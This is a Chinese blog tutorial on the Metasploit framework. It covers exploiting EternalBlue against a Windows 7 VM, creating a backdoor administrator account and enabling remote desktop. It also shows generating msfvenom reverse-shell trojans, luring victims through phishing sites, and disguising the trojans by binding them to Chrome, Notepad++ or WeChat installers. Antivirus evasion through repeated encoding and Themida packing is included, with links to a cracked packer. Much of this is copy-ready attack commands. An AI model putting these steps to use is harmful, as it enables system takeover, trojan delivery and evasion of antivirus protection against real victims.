【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)

2023-11-01 12:59

本文主要是介绍【P3】最强渗透工具 - metasploit(安装配置及使用教程详解),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

    • 一、metasploit 是什么?
    • 二、metasploit 攻击 windows 操作系统
    • 三、metasploit 攻击永恒之蓝全流程
    • 四、metasploit 攻击成功后能做什么
      • 4.1、操作步骤
      • 4.2、攻击示例
    • 五、msfvenom 绕过杀毒软件技巧
      • 5.1、捆绑木马
      • 5.2、加壳:压缩壳、加密壳
        • 5.2.1、Themida:加壳软件
          • 5.2.1.1、Linux 下安装 Themida
          • 5.2.1.2、windows 下安装 Themida
          • 5.2.1.2、Themida 使用教程


包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。


一、metasploit 是什么?

Kali 最强渗透工具 - metasploit

  • msf 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的 shellcode,并持续保持更新

  • metasploit 让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击

二、metasploit 攻击 windows 操作系统

1、msfconsole:启动 metasploit 命令行 [命令行效率高,使用方便]

2、启动 metasploit 前需要做:

  • 打开 kali 终端

  • 使用 sudo su 命令,并输入 kali 的密码 kali,切换至 root 用户

  • 使用 msfdb init 命令初始化 metasploit 数据库(*可选)

3、操作步骤:

(1)、sudo su 切换到超级管理员 root 用户,密码 kali(无 root 用户需自行创建一个)

  • sudo su

在这里插入图片描述

(2)、msfconsole 启动 metasploit 命令行界面

  • msfconsole

在这里插入图片描述

三、metasploit 攻击永恒之蓝全流程

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件

1、使用模块:use exploit/windows/smb/ms17_010_eternalblue

2、设置必选项:查看必选项 [*required 为 yes 的就是必选项] show options

3、操作步骤

(1)、可以使用编号进行搜索模块,永恒之蓝编号被微软定义为 ms17_010

  • search ms17_010

在这里插入图片描述

  • exploit:漏洞攻击脚本

如图,可以通过 Description 查看模块是干什么的

(2)、使用模块

两种方法:

  • use 模块名称

  • use 模块编号

在这里插入图片描述

(3)、配置(设置)模块,可以先查看有哪些设置,告诉 msf 攻击谁,要干啥

  • show options

在这里插入图片描述

  • Required(必选项):只需要配置必选项为 yes 的即可

  • RHOSTS:地址

  • RPORT:端口,默认445

  • VERIFY_ARCH、VERIFY_TARGET:这两选项已经是配置好的,保持默认即可

  • Payload options:攻击载荷,默认 windows/x64/meterpreter/reverse_tcp:获取到目标机器的命令执行权限;攻击之后,你想干啥

  • EXITFUNC:默认已经配置好

  • LHOST:监听地址,攻击机的ip地址

  • LPORT:监听端口

(4)、启动靶机,win 7

  • 靶机安装参考:https://blog.csdn.net/qq_45138120/article/details/131350059

  • 靶机为 VMware 下的 Windows 虚拟机,Windows 版本无所谓

(5)、打开 cmd,使用 ipconfig 查看靶机 ip 地址

  • ipconfig

在这里插入图片描述

(6)、kali 设置攻击靶机地址

  • set RHOSTS 靶机ip

在这里插入图片描述

(7)、设置完毕后,可以再次使用 show options 查看是否配置齐全

  • show options

在这里插入图片描述

如图:查看 Required 配置项为 yes 的 Current Setting 当前设置是否为空,不为空即配置完毕

(8)、可以修改下默认的 LHOST 端口

  • set lport 22222

在这里插入图片描述

注:端口范围 0-65535


扩展:查看端口是否开放

① 查看445端口是否开启

  • netstat -an

在这里插入图片描述

② 此处攻击靶机一定要关闭防火墙

在这里插入图片描述


(9)、运行模块

  • run

在这里插入图片描述

如图,会自动进行攻击靶机,并且获取命名执行权限。攻击成功后,先打印 WIN 并进入 meterpreter

meterpreter:拿到了 Win 7 靶机的权限

(10)、可以使用 help 查看可以使用的命令

在这里插入图片描述

  • Command:命令

  • Description:命令的描述或解释

  • shutdown:关机

  • User interface Commands:用户接口命令

  • getdesktop:截图

  • keyscna:发送键盘指令

  • mouse:发送鼠标指令

(11)、退出

  • exit

在这里插入图片描述

四、metasploit 攻击成功后能做什么

1、攻击成功后能做什么

  • meterpreter 是强大的后渗透模块,可以输入 help 查看帮助信息

  • 远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统…这些看起来非常复杂又高级的操作都能用 meterpreter 中一行或几个字母,简单的命令完成

  • 例:创建后门用户并开启远程连接

    • shell

    • net user zhangsan 123456 /add && net localgroup administrators zhangsan /add

    • exit

    • run getgui -e

2、使用 Kali 渗透工具生成远控木马

(1)、msfvenom 是用来生成后门的软件,在目标机上执行后门,在本地监听上线

  • venom:毒,毒液

  • [* msfvenom 在 shell 里使用,不是 msfconsole 终端]

(2)、windows 可执行程序后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

  • msfvenom:执行使用的工具

  • -p:payload

  • windows/x64/meterpreter/reverse_tcp:payload_name 系统/架构/作用/方式;如果要攻击 Linux,将 windows 换成 Linux 即可(android,mac)

  • lhost=192.168.123.136 Iport=9999:payload设置(kali 地址,kali 端口)

  • -f:format

  • exe:exe,windows 可执行文件(ipk,jar,war)

  • -o:output,输入的文件名,如 demo.exe

4.1、操作步骤

(1)、生成木马文件

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

在这里插入图片描述

(2)、如图,文件生成在当前路径下

  • 可以使用 ls 进行查看

  • 可以使用 pwd 查看工作目录的绝对路径

在这里插入图片描述

(3)、可以使用钓鱼网站等诱骗受害人点击

在这里插入图片描述

(4)、将木马下载到本地,demo.exe

拉取到本地时,一定要关闭杀毒软件

木马病毒下载到本地会被杀毒软件截取,后续需要让木马绕过杀毒软件

在这里插入图片描述

木马病毒不可以直接运行,就跟钓鱼一样,需要将木马放在鱼钩上

(5)、终端控制台进入 msfconsole

  • msfconsole

在这里插入图片描述

(6)、使用 exploit/multi/handler 模块

  • use exploit/multi/handler

在这里插入图片描述

(7)、查看设置

  • show options

  • 可简写:options

在这里插入图片描述

  • Payload options:攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)

(8)、设置攻击载荷设置(设置成生成可执行程序后门时设置的 playload_name)

  • set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

(9)、设置 kali 地址

  • set lhost 192.168.159.128

在这里插入图片描述

(10)、设置端口(设置成生成可执行程序后门时设置的 Iport,必须一致)

  • set lport 9999

在这里插入图片描述

(11)、可以使用 options 再次查看设置信息

在这里插入图片描述

(12)、运行

  • run

在这里插入图片描述

现在鱼钩已经扔河里了,等待鱼儿上钩,有两种方法:1、将鱼儿摁在勾上,利用漏洞;2、姜太公钓鱼,愿者上钩。诱导鱼儿上钩

(13)、假如受害者上钩,双击本地的 deom.exe 文件

在这里插入图片描述

(14)、如图,受害者已上钩

在这里插入图片描述

  • meterpreter:获取到受害者电脑的执行权限

(15)、输入 help,查看可以执行的命令操作

  • help

在这里插入图片描述

4.2、攻击示例

(1)、webcam_list,查看受害者电脑是否有摄像头

  • webcam_list

在这里插入图片描述

(2)、我使用的是台式机,所以没有摄像头

五、msfvenom 绕过杀毒软件技巧

最基础的免杀 [ 对于其他杀毒软件效果不同,具体情况请自行尝试]*

5.1、捆绑木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x notepad++.exe -o notepad++.exemsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome.exemsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x firefox.exe -o firefox.exemsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o firefox.exe- -x:模板(要使用哪一个正常程序的模板作为后门的生成)
注:如果 notepad++ 过不了,可以换其它软件;路径下必须存在可执行程序
- -e /指定编码方式对攻击载荷进行重新编码
- -x /指定木马捆绑在哪个可执行程序模板上
- -i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现
- -f /指定 msf 编码器输出程序的格式
- -o /指定处理完毕后的文件输出路径

注:使用捆绑木马时,路径下必须存在可执行程序

(1)、在生成木马的路径下,先复制一个可执行程序过去,比如:chrome.exe

在这里插入图片描述

(2)、使用 msfvenom 生成一个 Windows 环境下的木马,并捆绑到 chrome.exe 上生成 chrome01.exe 的合成马

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome01.exe

其它示例:

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

x86/shikata_ga_nai 进行多次编码的方式进行免杀处理

在这里插入图片描述

(3)、在此路径下,可以看到生成一个 chrome01.exe 的木马

在这里插入图片描述

5.2、加壳:压缩壳、加密壳

5.2.1、Themida:加壳软件
5.2.1.1、Linux 下安装 Themida
  • Themida Linux下rar包 百度网盘下载链接:https://pan.baidu.com/s/1v6q8y0Xg-SXMUXX4roEyJg?pwd=8fr8

  • 提取码:8fr8

注:此压缩包 rar包,必须在 Linux 系统下进行解压,使用需要在 windows 下使用


扩展:解压rar包

(1)、安装 rar 包教程参考:https://blog.csdn.net/weixin_40293999/article/details/122733513

(2)、解压rar包

在这里插入图片描述


5.2.1.2、windows 下安装 Themida
  • Themida windows下文件夹百度网盘下载链接:https://pan.baidu.com/s/1vGaNf92vzUZbsMlzMwXNFA?pwd=sfcx

  • 提取码:sfcx

  • 下载后得到名为 Themida_x32_x64_v3.0.4.0_Repacked 的文件夹

在这里插入图片描述

5.2.1.2、Themida 使用教程

在这里插入图片描述

注:Themida.exe为32位;Themida64.exe为64位

(1)、打开下载后的 Themida_x32_x64_v3.0.4.0_Repacked 文件夹,双击 Themida64.exe 执行文件

在这里插入图片描述

在这里插入图片描述

(2)、将未加壳的木马可执行程序拉到 Themida 软件中

在这里插入图片描述

在这里插入图片描述

  • 也可以在 Themida 软件中选择导入的木马文件路径

(3)、点击 Protext 进行加壳

注:加壳前,先将杀毒软件关闭,等加壳完成后再打开

在这里插入图片描述

自动进行加壳保护,成功后,在本地会生成一个添加 Protext 名称的文件

(4)、如图,加壳完成,点击 Close 即可

在这里插入图片描述

在这里插入图片描述

这篇关于【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/323150

相关文章

Nginx 配置跨域的实现及常见问题解决

《Nginx配置跨域的实现及常见问题解决》本文主要介绍了Nginx配置跨域的实现及常见问题解决,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来... 目录1. 跨域1.1 同源策略1.2 跨域资源共享(CORS)2. Nginx 配置跨域的场景2.1

python使用库爬取m3u8文件的示例

《python使用库爬取m3u8文件的示例》本文主要介绍了python使用库爬取m3u8文件的示例,可以使用requests、m3u8、ffmpeg等库,实现获取、解析、下载视频片段并合并等步骤,具有... 目录一、准备工作二、获取m3u8文件内容三、解析m3u8文件四、下载视频片段五、合并视频片段六、错误

CSS place-items: center解析与用法详解

《CSSplace-items:center解析与用法详解》place-items:center;是一个强大的CSS简写属性,用于同时控制网格(Grid)和弹性盒(Flexbox)... place-items: center; 是一个强大的 css 简写属性,用于同时控制 网格(Grid) 和 弹性盒(F

gitlab安装及邮箱配置和常用使用方式

《gitlab安装及邮箱配置和常用使用方式》:本文主要介绍gitlab安装及邮箱配置和常用使用方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1.安装GitLab2.配置GitLab邮件服务3.GitLab的账号注册邮箱验证及其分组4.gitlab分支和标签的

spring中的ImportSelector接口示例详解

《spring中的ImportSelector接口示例详解》Spring的ImportSelector接口用于动态选择配置类,实现条件化和模块化配置,关键方法selectImports根据注解信息返回... 目录一、核心作用二、关键方法三、扩展功能四、使用示例五、工作原理六、应用场景七、自定义实现Impor

SpringBoot3应用中集成和使用Spring Retry的实践记录

《SpringBoot3应用中集成和使用SpringRetry的实践记录》SpringRetry为SpringBoot3提供重试机制,支持注解和编程式两种方式,可配置重试策略与监听器,适用于临时性故... 目录1. 简介2. 环境准备3. 使用方式3.1 注解方式 基础使用自定义重试策略失败恢复机制注意事项

MySQL MCP 服务器安装配置最佳实践

《MySQLMCP服务器安装配置最佳实践》本文介绍MySQLMCP服务器的安装配置方法,本文结合实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下... 目录mysql MCP 服务器安装配置指南简介功能特点安装方法数据库配置使用MCP Inspector进行调试开发指

nginx启动命令和默认配置文件的使用

《nginx启动命令和默认配置文件的使用》:本文主要介绍nginx启动命令和默认配置文件的使用,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录常见命令nginx.conf配置文件location匹配规则图片服务器总结常见命令# 默认配置文件启动./nginx

在Windows上使用qemu安装ubuntu24.04服务器的详细指南

《在Windows上使用qemu安装ubuntu24.04服务器的详细指南》本文介绍了在Windows上使用QEMU安装Ubuntu24.04的全流程:安装QEMU、准备ISO镜像、创建虚拟磁盘、配置... 目录1. 安装QEMU环境2. 准备Ubuntu 24.04镜像3. 启动QEMU安装Ubuntu4

使用Python和OpenCV库实现实时颜色识别系统

《使用Python和OpenCV库实现实时颜色识别系统》:本文主要介绍使用Python和OpenCV库实现的实时颜色识别系统,这个系统能够通过摄像头捕捉视频流,并在视频中指定区域内识别主要颜色(红... 目录一、引言二、系统概述三、代码解析1. 导入库2. 颜色识别函数3. 主程序循环四、HSV色彩空间详解